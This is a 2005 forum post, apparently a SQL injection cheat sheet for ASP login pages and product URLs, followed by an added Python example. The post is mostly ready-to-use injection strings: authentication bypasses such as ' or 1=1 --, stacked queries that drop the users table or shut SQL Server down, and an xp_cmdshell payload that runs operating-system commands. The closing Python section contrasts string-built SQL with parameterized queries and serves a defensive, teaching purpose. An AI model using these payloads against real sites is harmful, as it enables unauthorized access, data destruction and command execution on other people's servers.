
Author: sql   Sql Injection   Views: 7371


"Select * from table1 where login=' fuck ' and password=' hi' or 'a'='a ' "

Commonly used:
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Or:

fuck ' --
fuck " --

Username: ' or users.userName like 'a%' ---
Password: [Anything]

Once again, this performs an injected SQL query against our users table:

select userName from users where userName='' or
users.userName like 'a%' --' and userPass=''


select 1; select 1+2; select 1+3;

...would return three recordsets. The first would contain the value 1, the
second the value 3, and the third the value 4, etc. So, if we logged in with the
following credentials:

Username: ' or 1=1; drop table users; --
Password: [Anything]



Username: '; shutdown with nowait; --
Password: [Anything]

This would make our login.asp script run the following query:

select userName from users where userName='';
shutdown with nowait; --' and userPass=''




Username: '; exec master..xp_xxx; --
Password: [Anything]

All we have to do is pick the appropriate extended stored procedure and replace
xp_xxx with its name in the sample above. For example, if IIS was installed on
the same machine as SQL Server (which is typical for small one/two man setups),
then we could restart it by using the xp_cmdshell extended stored procedure
(which executes a command string as an operating-system command) and IIS reset.
All we need to do is enter the following user credentials into our getlogin.asp
page:

Username: '; exec master..xp_cmdshell 'iisreset'; --
Password: [Anything]

This would send the following query to SQL Server:

select userName from users where userName='';
exec master..xp_cmdshell 'iisreset'; --' and userPass=''



http://localhost/products.asp?productId=0%20or%201=1

Each %20 in the URL represents a URL-encoded space character, so the URL really
looks like this:

http://localhost/products.asp?productId=0 or 1=1

When used in conjunction with products.asp, the query looks like this:

select prodName from products where id = 0 or 1=1

Using a bit of know-how and some URL-encoding, we can just as easily pull the
name of the products field from the products table:

http://localhost/products.asp?productId=0%...%20having%201=1




Related posts: none   Posted: 2005/01/05 10:20 from 218.38.148.205
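As an added illustration that is not part of the original post, the login.asp query pattern quoted above is rebuilt against an in-memory SQLite table, beside the parameterized form of the same query; the table contents, the user "alice" and the function names are constructed for this example.

```python
import sqlite3


def make_db():
    """Constructed sample database: one legitimate user (assumed values)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (userName text, userPass text)")
    conn.execute("insert into users values ('alice', 's3cret')")
    return conn


def login_vulnerable(conn, user_name, user_pass):
    """Mirrors the login.asp pattern: user input is spliced into the SQL text.

    With user_name = "' or 1=1 --" the statement sent to the engine becomes
    select userName from users where userName='' or 1=1 --' and userPass='...'
    so the password check is commented out and every row matches.
    """
    sql = ("select userName from users where userName='" + user_name
           + "' and userPass='" + user_pass + "'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, user_name, user_pass):
    """Same query with bound parameters: the input is data, never SQL syntax.

    The quote characters and the '--' in the payload are compared literally
    against the stored column values, so a tautology cannot be injected.
    """
    sql = "select userName from users where userName=? and userPass=?"
    return [row[0] for row in conn.execute(sql, (user_name, user_pass))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology in username:",
          login_vulnerable(db, "' or 1=1 --", "anything"))
    print("vulnerable, tautology in password:",
          login_vulnerable(db, "bob", "hi' or 'a'='a"))
    print("parameterized, same inputs:",
          login_parameterized(db, "' or 1=1 --", "anything"))
    print("parameterized, real credentials:",
          login_parameterized(db, "alice", "s3cret"))
```

Binding parameters also defeats the stacked-query payloads shown above, since the driver never lets the input terminate one statement and start another.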
